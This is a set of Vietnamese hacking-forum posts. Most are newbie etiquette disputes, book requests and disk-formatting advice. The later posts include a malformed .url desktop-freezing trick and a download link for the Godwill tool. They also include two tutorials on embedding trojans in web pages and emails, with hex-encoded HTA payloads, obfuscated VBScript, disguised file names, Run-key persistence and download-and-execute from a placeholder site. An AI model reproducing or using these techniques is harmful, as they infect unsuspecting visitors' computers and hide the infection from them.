bất kỳ nơi nào tôi đặt chân đến việc đầu tiên tôi phải làm là tôi sẽ tìm hiều về lịch sử của nó và tất nhiên là luật lệ nơi này nữa/
còn việc đọc nội quy tất nhiên tôi đã đọc và không chỉ đọc một lần ,còn có thuộc lòng hay không á?
phải nó thật là thuộc từng chữ thì tôi chịu , nhưng những thứ cốt lõi nhất tôi đã lĩnh hội.
và tôi cố gắng khi hoạt động trên diễn đàn không vi phạm những nội qui ấy, bạn có thể kiểm tra xem những bài tôi viết ra có bị vào trash hay đã bị mod nhắc nhở vì spam chưa.
Hơn nữa ở trên tôi có nhắc bạn vinhhoxuan2005 vi tôi thấy rằng trong cách hỏi của bạn ấy có vài điểm không phù hợp với nội qui lắm.như là hiện giờ tiêu chí của diễn đàn là hướng vào bảo mật.
và tôi thiết nghĩ rằng những trò lặt vặt ( làm đứng máy victim ) chỉ phí thời gian cho những người muốn thực sự đi xa .
Nên ngay câu sau tôi đã góp ý cho bạn ấy là nên tìm những tài liệu bạn ấy đang cần ở đâu:
Như là việc tìm trên diễn đàn
hay là việc để thực sự đi xa thì nên đọc : những câu chuyện với rookie của anh conmale.
Vậy bạn bảo tôi là không muốn trả lời ở chỗ nào .Tôi đã trả lời cho bạn ấy cách tìm tài liệu và hướng đi cho newbie
PHải nói tôi cũng chỉ là Newbie như bao anh em khác trong đây , tôi thiết nghĩ chúng ta nên hướng nhau đi con đường đúng đắn và nền tảng . Nếu như điều đó bạn không thích thì thôi tôi cũng chẳng góp ý thêm làm gì nữa.
Vậy nhé
|
|
|
boy9x wrote:
gì cũng được --- nhưng có người hỏi thì phải có người trả lời chứ
ai lại bủn xỉn như legendayhacker & BuRaTiNoVnO
Nếu ai mà cũng như 2 ông này thì anh em mình còn biết học thủ thuật của ai nữa
Cho hỏi bạn định nghĩa từ "bủn xỉn" như thế nào ??
Hỏi tiếp cái nữa là bạn đã đọc kỹ bài của tôi chưa hay chỉ đọc lướt qua ??
bài của tôi như sau:
bạn ơi bạn đọc nội qui chưa vậy .
hơn nữa những thứ bạn muốn hỏi bạn đã tìm trên diễn đàn chưa thế.
Nếu bạn muốn thành cái gì đấy mình góp ý chân thành là đọc bài
những câu chuyện với rookie của anh conmale.
Tôi đã góp ý chân thành như thế mà bạn bảo tôi bủn xỉn.
Hơn nưa tôi nghĩ là bạn chỉ vô đây học : thủ thuật như bạn nói thì uổng quá. Tôi đã góp ý và đưa cho bạn một tài liệu hay đến thế mà bạn còn chê "bủn xỉn"
Còn bạn thích step by step thì cũng ok ,có nhiều diễn đàn còn hướng dẫn hay hơn HVA nhiều nhiều ( các bác đừng bảo em nói thế này là chê HVA).
Nhưng liệu bạn thu được gì từ những thủ thuật đó , hay chỉ nhắm mắt làm liều được thì được chẳng được thì thôi.
Một đề nghị cuối cùng : Bạn nên đọc kỹ bài của người khác và khi post bài thì suy nghĩ một tý"đề nghị chỉ là đề nghị bạn có thực hiện hay không là quyền của bạn"
|
|
|
Bác ơi trong kho sách của bác có các quyển này không ạ em đang cần ( nếu bác có làm ơn bác upload nên share cho em với)
C.J.Date An introduction to database system , addittion-wesley
J.Dullan , Principles of Database and Knowledge-base systems vol1,vol2 ,computer science
Computer Network ,Tabanenum
Internet working with TCP/IP vol 1,vol2, vol3
Thanks !
|
|
|
Bác ơi trong kho sách của bác có các quyển này không ạ em đang cần ( nếu bác có làm ơn bác upload nên share cho em với)
C.J.Date An introduction to database system , addittion-wesley
J.Dullan , Principles of Database and Knowledge-base systems vol1,vol2 ,computer science
Computer Network ,Tabanenum
Internet working with TCP/IP vol 1,vol2, vol3
Thanks !
|
|
|
vinhhoxuan2005 wrote:
có ai biết gì về Hacker không vậy? :?
minh rất muốn biết làm như thế nào để:
1. lấy password.
2. làm đứng máy victim
3. làm thế nào để vào máy victim khi biết 1 địa chỉ IP.
4. ISP là gì?
Rất mong quý sư huynh giúp đỡ giùm :cry:
LH: vinhhoxuan2005@yahoo.com
bạn ơi bạn đọc nội qui chưa vậy .
hơn nữa những thứ bạn muốn hỏi bạn đã tìm trên diễn đàn chưa thế.
Nếu bạn muốn thành cái gì đấy mình góp ý chân thành là đọc bài
những câu chuyện với rookie của anh conmale.
|
|
|
ddc_online wrote:
nói chung muốn trở thành 1 security trước tiên bạn phải là người hack được thì bạn mới biết FIX chứ nhưng muốn là hacker bạn còn phải có 1 sự thúc đẩy < cái này là do mỗi người lên ko nói lắm>
Bác này nói khá là mâu thuẫn Thế xin hỏi lại là bác lấy kiến thức nào để mà bác Hack người ta (không lẽ bác sinh ra đã có hết rồi :lol :lol )
Ít ra bác cần biết bảo mật thì bác mới biết chỗ nào là yếu nhất của hệ thống chỗ nào mà admin có thể không set và nhiều kiến thức khác nữa mới có thể hack đựoc chứ.
hay bác nói Hack là theo kiểu Step by Step .Em e cái này không ổn rồi.
|
|
|
Mình nghĩ là lỗi này chỉ làm cho vui thôi chớ chúng ta không nên mất công sức vào những thứ như thế này nữa .Thà trong thờigian nghịch thứ vớ vẩn ta tìm hiểu những nền tảng cơ bản nhất của IT (dành cho newbie) không thì đào sâu vấn đề ta mắc phải. Vì vậy nói về bug này ta nên dừng ở đây thôi đừng tốn giấy mực thời gian làm gì nữa.
Vậy ai có phát hiện gì mới thì post lên để anh em thử sức tiếp nào. Nhưng khi post nên có trách nhiệm giải thích tý chút về vấn đề nhá ,chứ cứ post không biết là thế mà không hiểu sao nó thế thì chán lắm.
Chúc vui
|
|
|
phamquoc_truong wrote:
Cảnh báo : Đọc đến hết bài hãy thực hành. Áp dụng cho xp, 2003 mọi phiên bản.
Trước hết ! bạn hãy bật cmd.exe <== bạn không làm bước này là dở khóc dở cười đó nha.
Dùng lệnh cd để chuyển thư mục về desktop của bạn.
Okie ! bạn mở notepad ra. Tạo file *.url (ví dụ thu.url chẳng hạn) có nội dung như sau :
Code:
[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
rồi lưu vào desktop. Thế là xong
Bạn chỉ cần xoá file thu.url bằng lệnh del thu.url mọi thứ sẽ được giải quyết.
Nguồn : securityfocus
HAVE FUN !
em đã đọc cái của bác rồi và cố tình không mở cmd xem nó dở khóc dở cười như thế nào .đúng là màn hình có giật cà tưng nhưng hầu như mọi thứ vẫn hoạt động bình thường .Vì nhấn ALT +TAP vẫn có thế đến đựoc cửa sổ khác hơn nữa CTRL + ALT +DEl vẫn hoạt động như thường .
Ngoài cách như các bác kia có nói thì em nghĩ ra một cách như sau:
đầu tiên nhấn CTRL + ALT +DEl hiện ra Task Manager chọn New task ( run)
rồi chuyển đến ổ C ( C rồi vào C:\Documents and Settings tìm account của mình vào thư mục desktop xoá file .url kia đi là xong.
Có điều ở đây là :
Code:
[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
với code như trên tại sao lại làm xảy ra hiện tượng desktop nhảy cà tưng .
bác nào hiểu thì giải thích cho anh em xem nào
|
|
|
TayBac wrote:
- Tại sao rõ ràng mình đã đánh lệnh Format C: /s mà máy lại Format ổ D (là ổ chứa Data của mình vậy?)
Rõ ràng lần cái Windows trước bạn đã để ổ C có định dạng file system là NTFS
mà cái này khi đĩa boot không hỗ trợ nhận dạng NTFS thì sẽ không nhìn thấy nó sẽ ngầm định đẩy tên ổ lên ( nghĩa là D thành C do ổ D bạn để Ở Fat 32 thường và Đĩa boot nhận ra )
- Bây giờ muốn Format ổ C thì phải làm sao ?
Tạm thời có 2 cách như sau :
1 bạn cho đĩa boot có nhận dạng file system là NTFS nó sẽ nhìn thấy Ổ C thật sự và format bình thường.
Hoặc bạn dùng PQ Magic chương trình này sẽ nhận được cả NTFS và bạn chỉ cần chạy chương trình từ đĩa boot ( đĩa boot nào mà trả có chương trình này) sau khi chạy bạn chỉ cần chọn format C thôi ( nó ở chế độ GUI nên dễ sử dụng khỏi cần hướng dẫn )
2 Trong trường hợp này chắc bạn muốn cài lại Windows đúng không thì nên chọn cách này thì hơn : cứ cho đĩa cài Windows vào chọn bình thường nhưng khi đến đoạn chọn ổ thì chọn ổ C và nó hỏi có Delete không thì có và nó sẽ format theo yêu cầu bạn muốn tốt nhất hiện giờ vẫn nên dùng File system là NTFS vì nhưng ưu điểm không thể phủ nhận của nó .
- Phục hồi lại Data trong ổ D thì dùng chương trình phục hồi dữ liệu nào là tốt nhất ?
Mong các bạn ai biết thì giúp mình với. Xin cảm ơn...
để phục hồi dữ liệu điều kiện tiên quyết là bạn không nên ghi bất cứ thứ gì lên ổ D hiện giờ để tránh xoá mất dữ liệu cũ .
còn chương trình thì cứ thử search ở mấy trang như echip xem họ giới thiệu cái nào tốt nhất và cách sử dụng thì dùng thôi .Hiện giờ mình cũng không biết là cái nào là tốt nhất cả nên chỉ góp ý được thế này thôi.
Chúc bạn sớm lấy lại data và lần sau nhớ cẩn thận hơn đối với những việc mình làm để tránh hậu quả đáng tiếc có thể xảy ra
|
|
|
dbvn wrote:
ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu
Đây link đây bạn thử coi .Tôi không khuyến khích bạn phá hoại hãy thử nên chính mình trước để xem kết quả là tốt nhất và để hiểu rõ cách thức của nó
http://www.remoteassessment.com/darchive/190982017.html
chúc vui
|
|
|
Tác giả : Một ai đó
Hướng dẫn sử dụng Godwill để gắn Trojan vào trang Web :
Godwill là một chương trình khá hữu dụng và dễ sử dụng dành cho mụch đích gắn kèm 1 file .exe( trojan) vào một trang web (htm.html)
Cách dùng xin tóm tắt như sau:
---===---
chạy chương trình chọn enter sau đó chọn nut "html" trong các nút ở dưới cùng cửa sổ godwill
Chọn "general options ( hinh 1 )
+enter exe file: path tới file trojan ( k2ps.exe )
+enter .html : trang web mà mình đã thiết kế
+enter output :tên trang web có đính mã godmessage ( ví dụ là : xxx.html thì sau khi hoàn tất sẽ xuất hiện file xxx.html ttrong thư mục godwill ,trang web này đã đính trojan không được mở
+các tuỳ chọn khác là dùng để thông báo về đường ICQ ...nếu là newbie thì không cần để ý cũng được ...
+browser wwwection : sau khi đọc trang web victim sẽ được chuyển về trang http://www.yahoo.com cung duoc
+HTA filename : sau khi xem trang web ,trong start-up của victim sẽ xuất hiện một file .HTA ,đặt tên file đó sao cho có vẻ "microsoft"một chút để victim khỏi nghi ngờ ( vd: msreg )
+sau đó chọn done
+phần advanced option không cần để ý cũng được.
+muốn save config hay không là tuỳ ý
nhấn nút có chữ "GEN" trang web có đính trojan sẽ được tạo ra
Have fun !
PS: trong godwill còn tích hợp một số tiện ích khác , các bạn tự tìm hiểu xem !!!
|
|
|
Tác giả:Một ai đó
Xin lỗi vì không rõ tác giả là ai. Vậy ai biết tác giả bài này thì điền hộ vào
mục tác giả.
Kĩ thuật gắn Trojan vào file HTML
Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề!
1) Hướng dẫn:
· Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file
trojan.exe để xài!
· Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex
· Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất
hay!) để sửa file temp.htm như sau:
Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...”
· Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác!
2) Mã nguồn:
· Files:
§ tempsrc.hta dùng để extract và execute trojan.exe
§ tempsrc.htm file htm chính
§ convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex
· Những vấn đề chính:
§ Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe
Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau:
Kí tự
L
P
T
V
C
l
u
b
2
0
0
1
Mã ANSI ở hệ 10
76
80
84
86
32
67
108
117
98
32
50
48
48
49
Mã ANSI ở hệ 16
4C
50
54
56
20
43
6C
75
62
20
32
30
30
31
Encode16 Decode16
“LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001”
‘--- VBScript Code ---
function encode16(st)
for i = 1 to len(st)
temp = hex((asc(mid(st,i,1)))
‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i
‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này
‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự
if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ...
temp =”0” & temp
end if
encode16 = encode16 & temp
next
end function
function decode16(st)
for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2
decode16 = decode16 & chr(“&h” & mid(st,i,2))
‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi
‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16
next
end function
‘--- VBScript Code ---
§ Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm
ü Mục đích:
+ giảm kích thước file
+ làm cho mã lệnh khó đọc đối với người khác
ü Ví dụ: thay vì viết lệnh rõ ràng:
on error resume next
dn=chr(34)
xd=vbcrlf
set wsh=createobject("wscript.shell")
set fso=createobject("scripting.filesystemobject")
Chúng ta cũng có thể viết lại như sau:
on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject")
Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không?
3) Hỏi/Đáp:
· Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không?
Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn!
· Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ?
· Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không?
Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe!
...
wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan
...
Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip
· Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không?
Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến!
Chúc các bạn thành công!
|
|
|
|
|
|
|